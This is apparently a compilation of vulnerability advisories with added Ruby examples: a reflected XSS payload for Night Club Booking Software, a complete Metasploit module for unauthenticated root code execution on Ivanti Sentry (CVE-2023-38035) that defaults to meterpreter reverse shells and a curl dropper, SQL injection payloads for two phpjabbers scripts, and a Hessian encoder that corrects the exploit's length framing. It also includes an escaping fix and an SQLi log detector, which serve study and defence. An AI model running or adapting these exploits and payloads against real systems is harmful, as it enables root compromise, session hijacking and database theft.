<pre><code>## Title: Night Club Booking Software-1.0 XSS-Reflected<br />## Author: nu11secur1ty<br />## Date: 09/09/2023<br />## Vendor: https://www.phpjabbers.com/<br />## Software: https://www.phpjabbers.com/night-club-booking-software/#sectionDemo<br />## Reference: https://portswigger.net/web-security/cross-site-scripting/reflected<br /><br />## Description:<br />The value of the `index` request parameter is copied into the value of an<br />HTML tag attribute which is encapsulated in double quotation marks. The<br />payload byymt"><script>alert(1)</script>fs5xr was submitted in the index<br />parameter. This input was echoed unmodified in the application's response,<br />so the double quote terminates the attribute, the > closes the tag and the<br />injected <script> element is parsed as markup. An attacker who gets a victim<br />to open a crafted link can run arbitrary JavaScript in the victim's browser<br />in the context of the vulnerable site (read the session, act as the user,<br />rewrite the page). Note that the request below was sent as an XHR<br />(X-Requested-With: XMLHttpRequest); exploiting it through a link the victim<br />opens directly relies on the same response being served as HTML to a<br />top-level navigation.<br /><br />STATUS: HIGH-CRITICAL Vulnerability<br /><br />[+]Test Payload:<br />```http<br />GET /1694244800_322/index.php?controller=pjFront&action=pjActionSearch&session_id=&locale=1&index=6254byymt%22%3e%3cscript%3ealert(1)%3c%2fscript%3efs5xr&date= HTTP/1.1<br />Host: demo.phpjabbers.com<br />Accept-Encoding: gzip, deflate<br />Accept: */*<br />Accept-Language: en-US;q=0.9,en;q=0.8<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.141 Safari/537.36<br />Connection: close<br />Cache-Control: max-age=0<br />Cookie: _ga=GA1.2.825432071.1694256178; _gid=GA1.2.1157015144.1694256178; _gat=1; _fbp=fb.1.1694256177815.1029224882<br />X-Requested-With: XMLHttpRequest<br />Referer: https://demo.phpjabbers.com/1694244800_322/preview.php?lid=1<br />Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="116", "Chromium";v="116"<br />Sec-CH-UA-Platform: Windows<br />Sec-CH-UA-Mobile: ?0<br /><br />```<br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2023/Night-Club-Booking-Software-1.0)<br /><br />## Proof and Exploit:<br />[href](https://www.nu11secur1ty.com/2023/09/night-club-booking-software-10-xss.html)<br /><br />## Time spent:<br />00:05:00<br /><br /><br /></code></pre>
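Added example, not from the advisory and not the vendor's code: the attribute-context breakout in Ruby. The template shape (`<input ... value="...">`) and the function names are assumptions, since the real PHP sink is not shown on the page. It URL-decodes the `index` value from the request above, renders it into a double-quoted attribute first unchanged and then through `CGI.escapeHTML`, and lists the tags a browser would see in each output.

```ruby
require 'cgi'

# Raw value of the index parameter, copied from the request in the advisory.
RAW_INDEX_PARAM = '6254byymt%22%3e%3cscript%3ealert(1)%3c%2fscript%3efs5xr'

# URL-decode the parameter the way the server does before it reaches the template.
def decoded_index_param
  CGI.unescape(RAW_INDEX_PARAM) # => 6254byymt"><script>alert(1)</script>fs5xr
end

# Assumed vulnerable sink (the real template is not on the page): the parameter is
# concatenated into a double-quoted attribute unchanged, so the `"` in the payload
# terminates the attribute, `>` closes the tag and the rest is parsed as new markup.
def render_vulnerable(index)
  %(<input type="hidden" name="index" value="#{index}">)
end

# Hardened sink: escape for the HTML attribute context. CGI.escapeHTML turns
# & < > " ' into entities, so the browser keeps the whole value inside the attribute.
def render_hardened(index)
  %(<input type="hidden" name="index" value="#{CGI.escapeHTML(index)}">)
end

# Names of every start/end tag present in a fragment. A correct render of a single
# <input> yields exactly ["input"].
def tag_names(html)
  html.scan(/<\/?([a-zA-Z][\w-]*)/).flatten
end

# The check a scanner applies: did the probe become a <script> element?
def reflected_as_tag?(html)
  tag_names(html).include?('script')
end

if __FILE__ == $PROGRAM_NAME
  value = decoded_index_param
  puts "vulnerable: #{tag_names(render_vulnerable(value)).inspect}" # ["input", "script", "script"]
  puts "hardened:   #{tag_names(render_hardened(value)).inspect}"   # ["input"]
end
```

The hardened form is the fix for this context only: a value written into a JavaScript string, a URL attribute or an unquoted attribute needs the escaping rule of that context, not HTML entity encoding alone.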
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br />  Rank = ExcellentRanking<br /><br />  include Msf::Exploit::Remote::HttpClient<br />  include Msf::Exploit::CmdStager<br />  prepend Msf::Exploit::Remote::AutoCheck<br /><br />  def initialize(info = {})<br />    super(<br />      update_info(<br />        info,<br />        'Name' => 'Ivanti Sentry MICSLogService Auth Bypass resulting in RCE (CVE-2023-38035)',<br />        'Description' => %q{<br />          This module exploits an authentication bypass in Ivanti Sentry which exposes API functionality which<br />          allows for code execution in the context of the root user.<br />        },<br />        'Author' => [<br />          'Zach Hanley', # Analysis & PoC<br />          'James Horseman', # Analysis & PoC<br />          'jheysel-r7' # Msf module<br />        ],<br />        'References' => [<br />          [ 'URL', 'https://github.com/horizon3ai/CVE-2023-38035'],<br />          [ 'URL', 'https://www.horizon3.ai/ivanti-sentry-authentication-bypass-cve-2023-38035-deep-dive/'],<br />          [ 'CVE', '2023-38035']<br />        ],<br />        'License' => MSF_LICENSE,<br />        'DefaultOptions' => {<br />          'RPORT' => 8443,<br />          'SSL' => true,<br />          'FETCH_WRITABLE_DIR' => '/tmp'<br />        },<br />        'Platform' => ['unix', 'linux'],<br />        'Privileged' => false,<br />        'Arch' => [ ARCH_CMD, ARCH_X64 ],<br />        'Targets' => [<br />          [<br />            'Unix (In-Memory)',<br />            {<br />              'Platform' => ['unix', 'linux'],<br />              'Arch' => ARCH_CMD,<br />              'Type' => :unix_cmd,<br />              'DefaultOptions' => {<br />                'PAYLOAD' => 'cmd/linux/http/x64/meterpreter_reverse_tcp'<br />              }<br />            }<br />          ],<br />          [<br />            'Linux Dropper',<br />            {<br />              'Platform' => 'linux',<br />              'Arch' => [ARCH_X86, ARCH_X64],<br />              'Type' => :linux_dropper,<br />              'DefaultOptions' => {<br />                'CMDSTAGER::FLAVOR' => :curl,<br />                'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'<br />              }<br />            }<br />          ]<br />        ],<br />        'DefaultTarget' => 0,<br />        'DisclosureDate' => '2023-08-21',<br />        'Notes' => {<br />          'Stability' => [ CRASH_SAFE ],<br />          'SideEffects' => [ IOC_IN_LOGS, ARTIFACTS_ON_DISK ],<br />          'Reliability' => [ REPEATABLE_SESSION ]<br />        }<br />      )<br />    )<br /><br />    register_options(<br />      [<br />        OptBool.new('USE_SUDO', [true, 'Execute payload as root using sudo', true]),<br />        OptInt.new('SLEEP', [true, 'How long to wait for each command to run. Because the execution context does not allow for command piping or chaining the module needs to split the multi command payload by semi-colon and send each command individually', 3 ]),<br />      ]<br />    )<br />  end<br /><br />  def check<br />    # Unauthenticated access to the vulnerable endpoint was removed in patched versions of Sentry.<br />    # Send an unsupported GET request and see if it responds politely.<br />    res = send_request_cgi(<br />      'uri' => normalize_uri(target_uri.path, '/mics/services/MICSLogService'),<br />      'method' => 'GET'<br />    )<br /><br />    return Exploit::CheckCode::Unknown('The target did not respond to the vulnerable endpoint') unless res<br />    return Exploit::CheckCode::Safe("A vulnerable instance should respond with an HTTP 405 with the string: 'HessianServiceExporter only supports POST requests' in the response body") unless res.code == 405 && res.body.include?('HessianServiceExporter only supports POST requests')<br /><br />    Exploit::CheckCode::Appears<br />  end<br /><br />  def execute_command(cmd, _opts = {})<br />    # Below is the Hessian binary web service protocol wrapper required to invoke the function `uploadFileUsingFileInput`<br />    # which allows for unauthenticated command execution in the context of the root user.<br />    # More info on Hessian: http://hessian.caucho.com/doc/hessian-1.0-spec.xtp#Headers<br />    #   c 0x01 0x00             call, Hessian protocol version 1.0<br />    #   m 0x00 0x18 <name>      method name with 16-bit big-endian length (0x18 = 24 characters)<br />    #   M ... z                 map of named arguments, closed by 'z'<br />    #   S 0x00 0x07 command     string key "command"; its value follows as 'S' + 16-bit length + bytes<br />    #   S 0x00 0x06 isRoot T    string key "isRoot" with boolean true<br />    #   N z                     a null second argument, then end of the call<br />    exploit_header = "c\x01\x00m\x00\x18uploadFileUsingFileInputMS\x00\x07commandS\x00"<br />    exploit_footer = "S\x00\x06isRootTzNz"<br /><br />    # The sink in this RCE is java's Runtime.getRuntime.exec(). So we must prefix our command with 'sh -c $@|sh .echo'<br />    # in order to obtain full shell functionality, more info: https://codewhitesec.blogspot.com/2015/03/sh-or-getting-shell-environment-from.html<br />    cmd = "sh -c $@|sh . echo #{cmd}"<br />    cmd = "sudo #{cmd}" if datastore['USE_SUDO']<br /><br />    vprint_status('Running the command: ' + cmd)<br /><br />    # Prepend the command with the length of the command as per Hessian notation.<br />    # The header already supplies the high byte (0x00) of the 16-bit string length and pack('C')<br />    # emits only the low byte, so this framing is correct for commands of at most 255 bytes.<br />    data = exploit_header + [cmd.length].pack('C') + cmd + exploit_footer<br />    res = send_request_raw(<br />      'uri' => normalize_uri(target_uri.path, '/mics/services/MICSLogService'),<br />      'method' => 'POST',<br />      'data' => data<br />    )<br /><br />    fail_with(Failure::Unreachable, 'The target did not respond to the exploit attempt') unless res<br />    fail_with(Failure::UnexpectedReply, "The response from a successful exploit attempt should be a HTTP 200 with 'isRunning' in the response body.") unless res.code == 200 && res.body.include?('isRunning')<br />  end<br /><br />  def exploit<br />    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")<br />    case target['Type']<br />    when :unix_cmd<br />      execute_command(payload.encoded)<br />    when :linux_dropper<br />      execute_cmdstager<br />    end<br />  end<br />end<br /></code></pre>
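Added example, not part of the Metasploit module above or of the Horizon3 PoC: a small Hessian 1.0 encoder in Ruby that builds the same `uploadFileUsingFileInput` call the module sends, but with the full 16-bit string length the specification defines. `module_style_request` reproduces the module's hand-rolled framing so the two can be compared byte for byte; `wrap_for_runtime_exec` is a hypothetical helper name that applies the `sh -c $@|sh . echo` prefix the module uses. Nothing is sent to any host.

```ruby
# Hessian 1.0 primitives, per http://hessian.caucho.com/doc/hessian-1.0-spec.xtp
# String: 'S' + 16-bit big-endian length + data. The length counts characters, which
# equals the byte count only for ASCII, so this example rejects anything else.
def hessian_string(str)
  s = str.to_s
  raise ArgumentError, 'example supports ASCII strings only' unless s.ascii_only?
  raise ArgumentError, 'Hessian 1.0 string length is 16-bit' if s.bytesize > 0xFFFF
  'S'.b + [s.bytesize].pack('n') + s.b
end

def hessian_bool(flag)
  (flag ? 'T' : 'F').b
end

def hessian_null
  'N'.b
end

# Map: 'M', then key/value pairs, closed by 'z'. Keys here are strings.
def hessian_map(pairs)
  'M'.b + pairs.map { |k, v| hessian_string(k) + v }.join.b + 'z'.b
end

# Call: 'c' major minor, 'm' + 16-bit length + method name, the encoded arguments, 'z'.
def hessian_call(method, *args)
  "c\x01\x00m".b + [method.bytesize].pack('n') + method.b + args.join.b + 'z'.b
end

# The module's Runtime.exec() workaround: hand the real command to sh through $@.
# (Hypothetical helper name; the prefix itself is the one the module uses.)
def wrap_for_runtime_exec(cmd, sudo: true)
  wrapped = "sh -c $@|sh . echo #{cmd}"
  sudo ? "sudo #{wrapped}" : wrapped
end

# Spec-conformant request: uploadFileUsingFileInput({command: cmd, isRoot: true}, null)
def mics_upload_request(cmd, is_root: true)
  hessian_call('uploadFileUsingFileInput',
               hessian_map([['command', hessian_string(cmd)],
                            ['isRoot', hessian_bool(is_root)]]),
               hessian_null)
end

# The module's framing: the high length byte is fixed at 0x00 in the header and
# pack('C') keeps only the low byte, so the bytes are identical to the encoder above
# for commands of at most 255 bytes and silently wrong above that.
def module_style_request(cmd)
  header = "c\x01\x00m\x00\x18uploadFileUsingFileInputMS\x00\x07commandS\x00".b
  footer = "S\x00\x06isRootTzNz".b
  header + [cmd.length].pack('C') + cmd.b + footer
end

if __FILE__ == $PROGRAM_NAME
  cmd = wrap_for_runtime_exec('id')
  puts "identical for #{cmd.bytesize} bytes: #{mics_upload_request(cmd) == module_style_request(cmd)}"
  long = 'x' * 300
  puts "identical for 300 bytes: #{mics_upload_request(long) == module_style_request(long)}"
end
```

A staged payload that exceeds 255 bytes after the `sudo sh -c $@|sh . echo` prefix is added will therefore be mis-framed by the module; the cmdstager target keeps each chunk short, which is why the limitation does not surface in normal use.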
<pre><code>## Title: PHP Shopping Cart-4.2 Multiple-SQLi<br />## Author: nu11secur1ty<br />## Date: 09/13/2023<br />## Vendor: https://www.phpjabbers.com/<br />## Software: https://www.phpjabbers.com/php-shopping-cart-script/#sectionPricing<br />## Reference: https://portswigger.net/web-security/sql-injection<br /><br />## Description:<br />The `id` parameter of the pjActionGetStocks request appears to be vulnerable<br />to SQL injection. A single quote was submitted in the id parameter, and a<br />database error message was returned. Two single quotes were then submitted<br />and the error message disappeared, which shows the value reaches the query<br />as an unescaped string literal. The `1')` prefix of the payloads below shows<br />the value sits inside a quoted, parenthesised expression; boolean-based blind,<br />error-based and time-based blind injection were all confirmed (sqlmap output<br />below). An attacker can read the entire database of this web application.<br />WARNING: check for this issue before buying or deploying this product.<br /><br />STATUS: HIGH-CRITICAL Vulnerability<br /><br />[+]Payload:<br />```mysql<br />---<br />Parameter: id (GET)<br />    Type: boolean-based blind<br />    Title: OR boolean-based blind - WHERE or HAVING clause (NOT)<br />    Payload: controller=pjFront&action=pjActionGetStocks&id=1') OR NOT 3795=3795-- sRcp&session_id=<br /><br />    Type: error-based<br />    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)<br />    Payload: controller=pjFront&action=pjActionGetStocks&id=1') AND GTID_SUBSET(CONCAT(0x71717a6b71,(SELECT (ELT(3820=3820,1))),0x7178627871),3820)-- kQZA&session_id=<br /><br />    Type: time-based blind<br />    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br />    Payload: controller=pjFront&action=pjActionGetStocks&id=1') AND (SELECT 2625 FROM (SELECT(SLEEP(5)))nVyA)-- FGLs&session_id=<br />---<br /><br />```<br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2023/PHP-Shopping-Cart-4.2)<br /><br />## Proof and Exploit:<br />[href](https://www.nu11secur1ty.com/2023/09/php-shopping-cart-42-multiple-sqli.html)<br /><br />## Time spent:<br />00:37:00<br /><br /><br /></code></pre>
<pre><code>## Title: Fundraising Script-1.0 SQLi<br />## Author: nu11secur1ty<br />## Date: 09/13/2023<br />## Vendor: https://www.phpjabbers.com/<br />## Software: https://www.phpjabbers.com/fundraising-script/#sectionDemo<br />## Reference: https://portswigger.net/web-security/sql-injection<br /><br />## Description:<br />The `cid` parameter of the pjActionLoadCampaign request appears to be<br />vulnerable to SQL injection. The payload ' was submitted in the cid<br />parameter, and a database error message was returned. Error-based injection<br />through UPDATEXML was confirmed (sqlmap output below); the payload replaces<br />the whole value and closes no quote, consistent with an unquoted numeric<br />context. The demo database is empty, but on a live deployment the same<br />injection exposes whatever donor and campaign data the instance stores.<br />An attacker can read all information from the database.<br /><br />STATUS: HIGH-CRITICAL Vulnerability<br /><br />[+]Payload:<br />```mysql<br />---<br />Parameter: cid (GET)<br />    Type: error-based<br />    Title: MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)<br />    Payload: controller=pjFront&action=pjActionLoadCampaign&cid=(UPDATEXML(1741,CONCAT(0x2e,0x71626b7071,(SELECT (ELT(1741=1741,1))),0x7162787171),3873))<br />---<br /><br />```<br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2023/Fundraising-Script-1.0)<br /><br />## Proof and Exploit:<br />[href](https://www.nu11secur1ty.com/2023/09/fundraising-script-10-sqli.html)<br /><br />## Time spent:<br />01:15:00<br /><br /><br /></code></pre>
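Added example, not from either advisory and not sqlmap's code, serving both the PHP Shopping Cart and the Fundraising Script advisories above: detection logic in Ruby run over constructed access-log lines. The log format, client addresses and timestamps are made up for the example; the `id` and `cid` values are the advisory payloads, URL-encoded as a server would log them. Each query parameter is decoded and tagged with the injection technique its payload belongs to, and the hex literals sqlmap uses as result markers are decoded so they can be recognised in logs and error pages.

```ruby
require 'uri'

# Constructed access-log lines (addresses and times are made up); the id/cid
# payloads are the ones from the two advisories, URL-encoded. The last line is benign.
SAMPLE_LOG = <<~LOG
  203.0.113.5 - - [13/Sep/2023:10:01:02 +0000] "GET /index.php?controller=pjFront&action=pjActionGetStocks&id=1%27%29%20OR%20NOT%203795%3D3795--%20sRcp&session_id= HTTP/1.1" 200 2231
  203.0.113.5 - - [13/Sep/2023:10:01:09 +0000] "GET /index.php?controller=pjFront&action=pjActionGetStocks&id=1%27%29%20AND%20%28SELECT%202625%20FROM%20%28SELECT%28SLEEP%285%29%29%29nVyA%29--%20FGLs&session_id= HTTP/1.1" 200 2231
  203.0.113.5 - - [13/Sep/2023:11:15:44 +0000] "GET /index.php?controller=pjFront&action=pjActionLoadCampaign&cid=%28UPDATEXML%281741%2CCONCAT%280x2e%2C0x71626b7071%2C%28SELECT%20%28ELT%281741%3D1741%2C1%29%29%29%2C0x7162787171%29%2C3873%29%29 HTTP/1.1" 500 618
  198.51.100.7 - - [13/Sep/2023:11:16:01 +0000] "GET /index.php?controller=pjFront&action=pjActionGetStocks&id=17&session_id= HTTP/1.1" 200 2231
LOG

# Signatures keyed by the technique family they indicate, matched on the decoded value.
SQLI_SIGNATURES = {
  error_based:        /\b(?:UPDATEXML|EXTRACTVALUE|GTID_SUBSET)\s*\(/i,
  time_based:         /\b(?:SLEEP|BENCHMARK)\s*\(/i,
  boolean_based:      /['")]\s*(?:AND|OR)\s+(?:NOT\s+)?\d+\s*=\s*\d+/i,
  comment_terminator: /--\s|\/\*/
}.freeze

# sqlmap brackets extracted data with hex-encoded marker strings such as
# 0x71626b7071 ("qbkpq"); decoding them makes its output recognisable in error pages.
def decode_hex_literals(value)
  value.scan(/0x((?:[0-9a-f]{2})+)\b/i).flatten.map { |h| [h].pack('H*') }
end

# Parse the request line of one combined-log entry into [path, query], or nil.
def request_target(line)
  m = line.match(/"(?:GET|POST)\s+(\S+)\s+HTTP\//)
  return nil unless m
  path, query = m[1].split('?', 2)
  [path, query || '']
end

# Decode the query string into [name, value] pairs; malformed encodings are skipped.
def decoded_params(query)
  URI.decode_www_form(query)
rescue ArgumentError
  []
end

# Scan every line and report each parameter whose decoded value matches a signature.
def analyze_log(log)
  log.each_line.with_index(1).flat_map do |line, n|
    _path, query = request_target(line)
    next [] unless query
    decoded_params(query).each_with_object([]) do |(name, value), out|
      hits = SQLI_SIGNATURES.select { |_, re| value.match?(re) }.keys
      out << { line: n, param: name, value: value, techniques: hits } unless hits.empty?
    end
  end
end

if __FILE__ == $PROGRAM_NAME
  analyze_log(SAMPLE_LOG).each do |f|
    puts "line #{f[:line]} #{f[:param]}=#{f[:value]} -> #{f[:techniques].join(', ')}"
  end
end
```

Matching on the decoded value matters: the same payloads arrive as `%27%29`, `%28SELECT` and so on, and a rule written against the raw request line misses the variants that encode differently. The signatures flag the sqlmap-style probes seen here; they are a triage aid, not a substitute for parameterised queries in the application.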